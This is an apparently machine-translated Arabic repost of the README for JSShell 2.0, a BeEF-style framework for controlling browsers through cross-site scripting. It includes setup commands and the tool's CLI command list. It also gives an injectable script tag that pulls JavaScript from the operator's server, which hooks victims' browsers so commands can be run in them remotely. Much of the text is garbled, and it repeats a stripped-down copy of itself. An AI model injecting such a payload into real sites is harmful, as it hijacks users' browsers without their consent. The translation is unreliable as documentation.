JSShell - شبكة تفاعلية متعددة المستخدمين JS Shell
عبارة عن غلاف جافا سكريبت تفاعلي متعدد المستخدمين يستند إلى الويب. تم إنشاؤه في البداية من أجل تصحيح المستعرضات الباطنية عن بعد أثناء التجارب والبحوث. يمكن إرفاق هذه الأداة بسهولة مع حمولة XSS (البرمجة عبر الموقع) لتحقيق تنفيذ التعليمات البرمجية عن بعد للمتصفح (على غرار إطار عمل BeeF).
تم إنشاء الإصدار 2.0 بالكامل من الصفر ، حيث يقدم ميزات جديدة مثيرة وثبات وقابلية الصيانة.
المؤلف
دانييل ابلز .
شل فيديو
المميزات
دعم متعدد العملاء
دعم كائنات DOM الدائرية
قبل رحلة الخطوط
Command Queue & Context
قابل للتوسعة مع الوظائف الإضافية
عن طريق الحقن عن طريق
إخراج إخراج التفريغ إلى الملف
ترقيم الصفحات
ملف تكوين التثبيت والإعداد
في
مضيف قاعدة البيانات - في حالة تشغيله باستخدام
عنوان URL للعودة - عنوان URL الذي ستتبعه الطلبات. يقوم
البرنامج النصي لبدء التشغيل - برنامج نصي يتم تشغيله تلقائيًا عند إنتاج عميل JSShell CLI.
من الممكن أيضاً الإشارة إلى قاعدة بيانات بعيدة عند الرغبة.
عامل الميناء صرح
هذا الإصدار الجديد بالتثبيت وتشغيله عبر
بدء وإنشاء قاعدة البيانات في الخلفية
ابدأ خادم واجهة برمجة تطبيقات الويب الذي يعالج الاتصالات الواردة في الخلفية
إنتاج نسخة جديدة من حاوية واجهة
منتظم
إذا كنت لا تزال ترغب في استخدام طريقة تثبيت الطراز القديم ، فاحرص فقط على
أوصي باستخدام بيئة افتراضية مع
قيد التشغيل
إذا استخدمت
خادم الويب
بخلاف ذلك ، بمجرد إعداد قاعدة البيانات ، نحتاج إلى بدء خادم واجهة برمجة تطبيقات الويب. للقيام ، قم بتشغيل:
Shell
الآن لبدء تشغيل JSShell CLI ، قم بتشغيل نفس البرنامج النصي ولكن الآن مع
الاستخدام
بعد الإعداد وتشغيل المكونات المطلوبة ، أدخل
تدفق
JSShell يدعم طريقتين للتشغيل:
شل قابل للحقن (على غرار إطار BeeF)
استضافت شل (لتصحيح الأخطاء)
شل قابل للحقن كما هو
الحال مع غيرها من أطر التحكم XSS (مثل BeeF) ، JSShell قادر على إدارة نجاحات XSS الناجحة. في المثال ، إذا كان بإمكانك إدخال
Shell المستضاف
إذا كنت ترغب في تصحيح المستعرضات الغريبة والظاهرة ، يمكنك ببساطة الانتقال إلى
الاعتمادات
Canop ل JSON.prune
استخدامها على مسؤوليتك والمخاطر الخاصة بك.
تنزيل JSShell
عبارة عن غلاف جافا سكريبت تفاعلي متعدد المستخدمين يستند إلى الويب. تم إنشاؤه في البداية من أجل تصحيح المستعرضات الباطنية عن بعد أثناء التجارب والبحوث. يمكن إرفاق هذه الأداة بسهولة مع حمولة XSS (البرمجة عبر الموقع) لتحقيق تنفيذ التعليمات البرمجية عن بعد للمتصفح (على غرار إطار عمل BeeF).
تم إنشاء الإصدار 2.0 بالكامل من الصفر ، حيث يقدم ميزات جديدة مثيرة وثبات وقابلية الصيانة.
المؤلف
دانييل ابلز .
شل فيديو
المميزات
دعم متعدد العملاء
دعم كائنات DOM الدائرية
قبل رحلة الخطوط
Command Queue & Context
قابل للتوسعة مع الوظائف الإضافية
عن طريق الحقن عن طريق
<script>العلاماتإخراج إخراج التفريغ إلى الملف
ترقيم الصفحات
ملف تكوين التثبيت والإعداد
في
resourcesالدليل ، قم بتحديثconfig.jsonالملف بالتهيئة التي تريدها:مضيف قاعدة البيانات - في حالة تشغيله باستخدام
dockerطريقة النشر ، اختر مضيف قاعدة البيانات باسم db(وهو اسم المضيف الداخلي).عنوان URL للعودة - عنوان URL الذي ستتبعه الطلبات. يقوم
shell.jsالملف ببعض مكالمات AJAX للتسجيل والاستفتاء للأوامر الجديدة. عادة سوف يكونhttp://{YOUR_SERVER_IP}:{PORT}.البرنامج النصي لبدء التشغيل - برنامج نصي يتم تشغيله تلقائيًا عند إنتاج عميل JSShell CLI.
من الممكن أيضاً الإشارة إلى قاعدة بيانات بعيدة عند الرغبة.
عامل الميناء صرح
هذا الإصدار الجديد بالتثبيت وتشغيله عبر
dockerو docker-compose. الآن ، لتثبيت وتشغيل إطار JSShell بالكامل ، قم ببساطة بتشغيل:$ ./start_docker_shell.shبدء وإنشاء قاعدة البيانات في الخلفية
ابدأ خادم واجهة برمجة تطبيقات الويب الذي يعالج الاتصالات الواردة في الخلفية
إنتاج نسخة جديدة من حاوية واجهة
JSShell سطر الأوامرمنتظم
إذا كنت لا تزال ترغب في استخدام طريقة تثبيت الطراز القديم ، فاحرص فقط على
MongoDBتشغيل قاعدة البيانات وتشغيلها وتحديث config.jsonالملف المقيم في resourcesالدليل. أوصي باستخدام بيئة افتراضية مع
pyenv:$ pyenv virtualenv -p python3.6 venv
$ pyenv activate venvvirtualenv:$ virtualenv -p python3.6 venv
$ source venv/bin/activate$ pip install -r requirements.txtقيد التشغيل
إذا استخدمت
dockerالطريقة ، فلا داعي لتشغيل الإجراء التالي. خادم الويب
بخلاف ذلك ، بمجرد إعداد قاعدة البيانات ، نحتاج إلى بدء خادم واجهة برمجة تطبيقات الويب. للقيام ، قم بتشغيل:
$ python manage.py webShell
الآن لبدء تشغيل JSShell CLI ، قم بتشغيل نفس البرنامج النصي ولكن الآن مع
shellالعلم:$ python manage.py shellالاستخدام
بعد الإعداد وتشغيل المكونات المطلوبة ، أدخل
helpالأمر لرؤية الأوامر المتاحة: ╦╔═╗┌─┐┬ ┬┌─┐┬ ┬
║╚═╗└─┐├─┤├┤ │ │
╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0
by @Daniel_Abeles
>> help
Documented commands (type help <topic>):
General Commands
--------------------------------------------------------------------------------
edit Edit a file in a text editor
help List available commands or provide detailed help for a specific command
history View, run, edit, save, or clear previously entered commands
ipy Enter an interactive IPython shell
py Invoke Python command or shell
quit Exit this application
Shell Based Operations
--------------------------------------------------------------------------------
back Un-select the current selected client
clients List and control the clients that have registered to our system
commands Show the executed commands on the selected client
dump Dumps a command to the disk
execute Execute commands on the selected client
select Select a client as the current client
>> تدفق
JSShell يدعم طريقتين للتشغيل:
شل قابل للحقن (على غرار إطار BeeF)
استضافت شل (لتصحيح الأخطاء)
شل قابل للحقن كما هو
الحال مع غيرها من أطر التحكم XSS (مثل BeeF) ، JSShell قادر على إدارة نجاحات XSS الناجحة. في المثال ، إذا كان بإمكانك إدخال
scriptعلامة ، فحقن المورد التالي في حمولتك ، وسيظهر عميل جديد في وحدة التحكم الخاصة بك: <script src="http://{YOUR_SERVER_IP}:{PORT}/content/js"></script>Shell المستضاف
إذا كنت ترغب في تصحيح المستعرضات الغريبة والظاهرة ، يمكنك ببساطة الانتقال إلى
http://{YOUR_SERVER_IP}:{PORT}/وإرادة عميل جديد انبثق إلى عميل JSShell CLI الخاص بك. الآن يمكن تصحيحه عبر وحدة تحكم JSShell الخاصة بنا. الاعتمادات
Canop ل JSON.prune
استخدامها على مسؤوليتك والمخاطر الخاصة بك.
تنزيل JSShell
Commentaires
Enregistrer un commentaire